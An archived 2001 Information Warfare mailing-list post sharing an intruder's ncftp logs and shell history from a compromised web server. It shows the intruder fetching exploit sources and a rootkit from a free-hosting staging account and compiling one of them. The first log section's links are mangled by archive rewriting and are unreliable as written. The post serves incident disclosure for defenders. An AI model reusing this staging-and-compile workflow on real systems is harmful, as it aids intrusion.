Return-Path: <sentto-279987-2390-1001567143-fc=all.net@returns.onelist.com>
Delivered-To: fc@all.net
Received: from 204.181.12.215 by localhost with POP3 (fetchmail-5.1.0) for fc@localhost (single-drop); Wed, 26 Sep 2001 22:09:07 -0700 (PDT)
Received: (qmail 32736 invoked by uid 510); 27 Sep 2001 05:06:51 -0000
Received: from n20.groups.yahoo.com (216.115.96.70) by 204.181.12.215 with SMTP; 27 Sep 2001 05:06:51 -0000
X-eGroups-Return: sentto-279987-2390-1001567143-fc=all.net@returns.onelist.com
Received: from [10.1.1.223] by n20.onelist.org with NNFMP; 27 Sep 2001 05:06:34 -0000
X-Sender: fc@big.all.net
X-Apparently-To: iwar@onelist.com
Received: (EGP: mail-7_3_2_2); 27 Sep 2001 05:05:43 -0000
Received: (qmail 80330 invoked from network); 27 Sep 2001 05:05:43 -0000
Received: from unknown (10.1.10.26) by 10.1.1.223 with QMQP; 27 Sep 2001 05:05:43 -0000
Received: from unknown (HELO big.all.net) (65.0.156.78) by mta1 with SMTP; 27 Sep 2001 05:06:31 -0000
Received: (from fc@localhost) by big.all.net (8.9.3/8.7.3) id WAA02210 for iwar@onelist.com; Wed, 26 Sep 2001 22:06:31 -0700
Message-Id: <200109270506.WAA02210@big.all.net>
To: iwar@onelist.com (Information Warfare Mailing List)
Organization: I'm not allowed to say
X-Mailer: don't even ask
X-Mailer: ELM [version 2.5 PL1]
From: Fred Cohen <fc@all.net>
Mailing-List: list iwar@yahoogroups.com; contact iwar-owner@yahoogroups.com
Delivered-To: mailing list iwar@yahoogroups.com
Precedence: bulk
List-Unsubscribe: <mailto:iwar-unsubscribe@yahoogroups.com>
Date: Wed, 26 Sep 2001 22:06:31 -0700 (PDT)
Reply-To: iwar@yahoogroups.com
Subject: [iwar] [fc:Logs.of.commands.issued.by.cracker.using.ncftp:.-]
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
For all those interested in some logs,
This cracker has compromised another website -
http://www.ac.ac.th/default.htm
Logs of commands issued by cracker using ncftp: -
LOG - unmodified
topcities.com at Sun Sep 23 18:00:36 2001
get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/su.c">ftp://accessftp: href="mailto:PASSWORD
@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/su.c</a>
topcities.com at Sun Sep 23 18:44:41 2001
topcities.com at Sun Sep 23 18:50:06 2001
get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/bsd.c">ftp://accessftp: href="mailto:PASSWOR
D@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/bsd.c</a>
get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/redhat.c">ftp://accessftp: href="mailto:PASS
WORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/redhat.c</a>
get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/lpd.c">ftp://accessftp: href="mailto:PASSWOR
D@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/lpd.c</a>
get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/bsd-x.c">ftp://accessftp: href="mailto:PASSW
ORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/bsd-x.c</a>
get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/aix.c">ftp://accessftp: href="mailto:PASSWOR
D@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/aix.c</a>
get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/apache.c">ftp://accessftp: href="mailto:PASS
WORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/apache.c</a>
get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/imapd.c">ftp://accessftp: href="mailto:PASSW
ORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/imapd.c</a>
get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/remove.c">ftp://accessftp: href="mailto:PASS
WORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/remove.c</a>
get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/rip.c">ftp://accessftp: href="mailto:PASSWOR
D@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/rip.c</a>
topcities.com at Sun Sep 23 19:59:46 2001
get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/wuftpd-god.c">ftp://accessftp: href="mailto:
PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/wuftpd-god.c</a>
topcities.com at Mon Sep 24 09:51:01 2001
topcities.com at Mon Sep 24 14:07:33 2001
topcities.com at Mon Sep 24 19:37:30 2001
get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/zone-pre">ftp://accessftp: href="mailto:PASS
WORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/zone-pre</a>
get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/SEClpd.c">ftp://accessftp: href="mailto:PASS
WORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/SEClpd.c</a>
get <a href="ftp://accessftp: href="mailto:PASSWORD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/t666.c">ftp://accessftp: href="mailto:PASSWO
RD@topcities.com?Subject=Re:%20Hacked%20using%20vulnerable%20FTP%20daemon.%2526In-Reply-To=%2526lt;3BB186FF.2010203@embrace.com">PASSWORD@topcities.com</a>/t666.c</a>
HISTORY - unmodified
get su.c
quit
ls
get su.c
quit
ls
quit
ls
get su.c
gcc -o su su.c
quit
ls
get bsd.c
get redhat.c
get lpd.c
get bsd-x..c
get bsd-x.c
getaix.c
get aix.c
get apache.c
get imapd.c
get remove.c
get rip.c
get rpc.autofsd.c
get wu-scan.c
quit
get wu.c
ls
get wuftpd-god.c
quit
ls
exit
ls
get zone-pre
get SEClpd
get SEClpd.c
get t666.c
get rpc.c
quit
[root@www .ncftp]# vi trace
-- modified to protect someone
SESSION STARTED at: Mon Sep 24 19:37:15 2001
Program Version: NcFTP 3.0.0/354 October 04 1999, 04:17 AM
Library Version: LibNcFTP 3.0b3 (October 2, 1999)
Process ID: 13472
Platform: linux-x86
Uname: Linux|www.COMPROMISED.com.sg|2.2.14-5.0smp|#1 SMP
Tue Mar 7 21:01:40 EST 2000|i686^M
Hostname: www.COMPROMISED.com.sg (rc=2)
19:37:15 Fw: firewall.COMPROMISED.com.sg Type: 0 User: jogja Pass:
******** Port: 21
19:37:15 FwExceptions: .COMPROMISED.com.sg,localhost,localdomain
19:37:15 Resolving topcities.com...
19:37:16 Connecting to 64.152.192.119...
19:37:17 Remote server is running NcFTPd.
19:37:17 Logging in...
19:37:17 220: topcities.com NcFTPd Server (licensed copy) ready.
19:37:17 Connected to 64.152.192.119.
19:37:17 Cmd: USER accessftp
19:37:28 331: User accessftp okay, need password.
19:37:28 Cmd: PASS xxxxxxxx
19:37:29 Logging in...
19:37:29 230:
#######################################################################
19:37:29
#######################################################################
19:37:29
19:37:29 Welcome, accessftp. You are now logged into your account.
19:37:29
19:37:29 Your web site address: http://accessftp.topcities.com
19:37:29 You are connected from IP Address: [COMPROMISED HOST IP]
19:37:29 Space limit for your account: 153600000 bytes
19:37:29 Space used: 5377648 bytes
19:37:29 Maximum per-file size: 900 Kb
19:37:29 Upload bandwidth limit: 5 kB/sec
19:37:29 Download bandwidth limit: 2 kB/sec
19:37:29 PT: 0.20
19:37:29
19:37:29 Note: Please do not exceed your account quota by
uploading files
19:37:29 larger than 900Kb or exceeding your space limit. If you
do, subsequent
19:37:29 uploads will be unsucessful without notice to you.
19:37:29
19:37:29
#######################################################################
19:37:29
#######################################################################
19:37:29
19:37:29
19:37:29
19:37:29 Restricted user logged in.
19:37:29 Cmd: PWD
19:37:29 257: "/" is cwd.
19:37:29 Logged in to 64.152.192.119 as accessftp.
19:37:29 Cmd: FEAT
19:37:30 211: Extensions supported:
19:37:30 CLNT
19:37:30 MDTM
19:37:30 MLST
type*;size*;modify*;UNIX.mode*;UNIX.owner;UNIX.uid;UNIX.group;UNIX.gid;unique
19:37:30 PASV
19:37:30 REST STREAM
19:37:30 SIZE
19:37:30 TVFS
19:37:30 Compliance Level: 19981201 (IETF mlst-05)
19:37:30 End.
19:37:30 Cmd: HELP SITE
19:37:30 214: The following SITE commands are recognized:
19:37:30
19:37:30 Logged in to topcities.com.
19:37:30 Cmd: CLNT NcFTP 3.0.0 linux-x86
19:37:31 200: Noted.
19:37:42 ls
19:37:42 Cmd: OPTS MLST
type;size;modify;UNIX.mode;UNIX.owner;UNIX.uid;UNIX.group;UNIX.gid
19:37:42 200: Options accepted:
type;size;modify;UNIX.mode;UNIX.uid;UNIX.gid
19:37:42 Cmd: PASV
19:37:42 227: Entering Passive Mode (64,152,192,119,11,87)
19:37:43 Cmd: MLSD
19:37:43 150: Data connection accepted from [COMPROMISED HOST IP]:3758;
transfer starting.
19:37:44 226: Listing completed.
19:37:44 Remote listing contents {
19:37:44
type=cdir;modify=20010923154433;UNIX.mode=0777;UNIX.uid=99;UNIX.gid=99 /
19:37:44
type=file;size=229995;modify=20010918134314;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
GaP.tcl
19:37:44
type=dir;modify=20010922190607;UNIX.mode=0755;UNIX.uid=99;UNIX.gid=99 IIS
19:37:44
type=file;size=9911;modify=20010918055419;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
SEClpd.c
19:37:44
type=file;size=44356;modify=20010915112702;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
VBTERM.ZIP
19:37:44
type=dir;modify=20010818023652;UNIX.mode=0777;UNIX.uid=99;UNIX.gid=99 _data
19:37:44
type=file;size=3543;modify=20010923093715;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
aix.c
19:37:44
type=file;size=55871;modify=20010911095825;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
allchan.tcl
19:37:44
type=file;size=6242;modify=20010915094640;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
amountdexp.zip
19:37:44
type=file;size=3066;modify=20010923094606;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
apache.c
19:37:44
type=file;size=5241;modify=20010911102601;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
ascii.tcl
19:37:44
type=file;size=24973;modify=20010919175706;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
bsd-x.c
19:37:44
type=file;size=25979;modify=20010913114244;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
bsd.c
19:37:44
type=file;size=53057;modify=20010911102624;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
fonts.txt
19:37:44
type=dir;modify=20010917133407;UNIX.mode=0755;UNIX.uid=99;UNIX.gid=99 ftp
19:37:44
type=file;size=3626;modify=20010911090829;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
host.tcl
19:37:44
type=file;size=3332;modify=20010915102000;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
imapd.c
19:37:44
type=file;size=2886;modify=20010919011110;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
index.htm
19:37:44
type=file;size=1784;modify=20010922040601;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
loadnc.asp
19:37:44
type=file;size=2516;modify=20010911121619;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
lpd.c
19:37:44
type=file;size=3726;modify=20010918075807;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
named.htm
19:37:44
type=file;size=75482;modify=20010919130336;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
nc110.tgz
19:37:44
type=file;size=2003;modify=20010911095755;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
ns.tcl
19:37:44
type=file;size=7127;modify=20010917160516;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
oftpd.tar.gz
19:37:44
type=file;size=689;modify=20010915095601;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
p3-sunos.tar.gz
19:37:44
type=file;size=29;modify=20010911180121;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
ps.txt
19:37:44
type=file;size=87;modify=20010911103054;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
psy.txt
19:37:44
type=file;size=197126;modify=20010905125107;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
psyBNC2.2.tar.gz
19:37:44
type=file;size=5181;modify=20010923104845;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
redhat.c
19:37:44
type=file;size=5101;modify=20010923164829;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
remove.c
19:37:44
type=file;size=5553;modify=20010911123908;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
rip.c
19:37:44
type=file;size=2721;modify=20010923130108;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
rkit.tar.gz
19:37:44
type=file;size=3341;modify=20010912062001;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
rpc.autofsd.c
19:37:44
type=file;size=2837;modify=20010923151532;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
rpc.c
19:37:44
type=file;size=2924;modify=20010912055334;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
rpcBSD.tar.gz
19:37:44
type=file;size=19119;modify=20010911125301;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
statdx.c
19:37:44
type=file;size=11990;modify=20010911121600;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
su.c
19:37:44
type=file;size=7394;modify=20010922100655;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
sunbrute.c
19:37:44
type=file;size=19809;modify=20010912055508;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
t666.c
19:37:44
type=file;size=242007;modify=20010921110904;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
tel.zip
19:37:44
type=file;size=2502;modify=20010919184357;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
unicode.txt
19:37:44
type=file;size=145408;modify=20010921111014;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
unzip.exe
19:37:44
type=file;size=492;modify=20010922040606;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
upload.asp
19:37:44
type=file;size=5867;modify=20010922040613;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
upload.inc
19:37:44
type=file;size=2095;modify=20010918063433;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
wu-scan.c
19:37:44
type=file;size=20964;modify=20010918085052;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
wuftpd-god.c
19:37:44
type=file;size=19343;modify=20010913115048;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
wuftpd.c
19:37:44
type=file;size=10244;modify=20010923154437;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
zone-pre
19:37:44 }
19:37:44 aix.c IIS/ psy.txt t666.c
19:37:44 allchan.tcl imapd.c redhat.c tel.zip
19:37:44 amountdexp.zip index.htm remove.c
unicode.txt
19:37:44 apache.c loadnc.asp rip.c unzip.exe
19:37:44 ascii.tcl lpd.c rkit.tar.gz
upload.asp
19:37:44 bsd.c named.htm rpc.autofsd.c
upload.inc
19:37:44 bsd-x.c nc110.tgz rpcBSD.tar.gz
VBTERM.ZIP
19:37:44 _data/ ns.tcl rpc.c wuftpd.c
19:37:44 fonts.txt oftpd.tar.gz SEClpd.c
wuftpd-god.c
19:37:44 ftp/ p3-sunos.tar.gz statdx.c wu-scan.c
19:37:44 GaP.tcl ps.txt su.c zone-pre
19:37:44 host.tcl psyBNC2.2.tar.gz sunbrute.c
19:38:01 get zone-pre
19:38:01 Cmd: TYPE I
19:38:01 200: Type okay.
19:38:01 Cmd: MLST zone-pre
19:38:02 250: Begin
19:38:02
type=file;size=10244;modify=20010923154437;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
/zone-pre
19:38:02 End.
19:38:02 Cmd: PASV
19:38:02 227: Entering Passive Mode (64,152,192,119,11,88)
19:38:02 Cmd: RETR zone-pre
19:38:03 150: Data connection accepted from [COMPROMISED HOST IP]:3759;
transfer starting for zone-pre (10244 bytes).
19:38:05 226: Transfer completed.
19:38:29 get SEClpd
19:38:29 Cmd: MLST SEClpd
19:38:30 550: No such file or directory.
19:38:30 Cmd: SIZE SEClpd
19:38:30 550: No such file.
19:38:30 Cmd: PASV
19:38:30 227: Entering Passive Mode (64,152,192,119,11,90)
19:38:31 Cmd: RETR SEClpd
19:38:31 550: No such file.
19:38:39 get SEClpd.c
19:38:39 Cmd: MLST SEClpd.c
19:38:39 250: Begin
19:38:39
type=file;size=9911;modify=20010918055419;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
/SEClpd.c
19:38:39 End.
19:38:39 Cmd: PASV
19:38:42 227: Entering Passive Mode (64,152,192,119,11,91)
19:38:42 Cmd: RETR SEClpd.c
19:38:42 150: Data connection accepted from [COMPROMISED HOST IP]:3761;
transfer starting for SEClpd.c (9911 bytes).
19:38:44 226: Transfer completed.
19:39:36 get t666.c
19:39:36 Cmd: MLST t666.c
19:39:37 250: Begin
19:39:37
type=file;size=19809;modify=20010912055508;UNIX.mode=0644;UNIX.uid=99;UNIX.gid=99
/t666.c
19:39:37 End.
19:39:37 Cmd: PASV
19:39:37 227: Entering Passive Mode (64,152,192,119,11,93)
19:39:38 Cmd: RETR t666.c
19:39:38 150: Data connection accepted from [COMPROMISED HOST IP]:3762;
transfer starting for t666.c (19809 bytes).
19:39:41 226: Transfer completed.
19:58:54 get rpc.c
19:58:54 Cmd: MLST rpc.c
19:58:54 Remote host has closed the connection.
19:58:54 421: Disconnecting you since you were inactive for 180 seconds.
19:58:54 Passive mode refused.
19:59:11 quit
SESSION ENDED at: Mon Sep 24 19:59:11 2001
------------------------ Yahoo! Groups Sponsor ---------------------~-->
Get your FREE VeriSign guide to security solutions for your web site: encrypting transactions, securing intranets, and more!
http://us.click.yahoo.com/UnN2wB/m5_CAA/yigFAA/kgFolB/TM
---------------------------------------------------------------------~->
------------------
http://all.net/
Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/
This archive was generated by hypermail 2.1.2 : 2001-09-29 21:08:50 PDT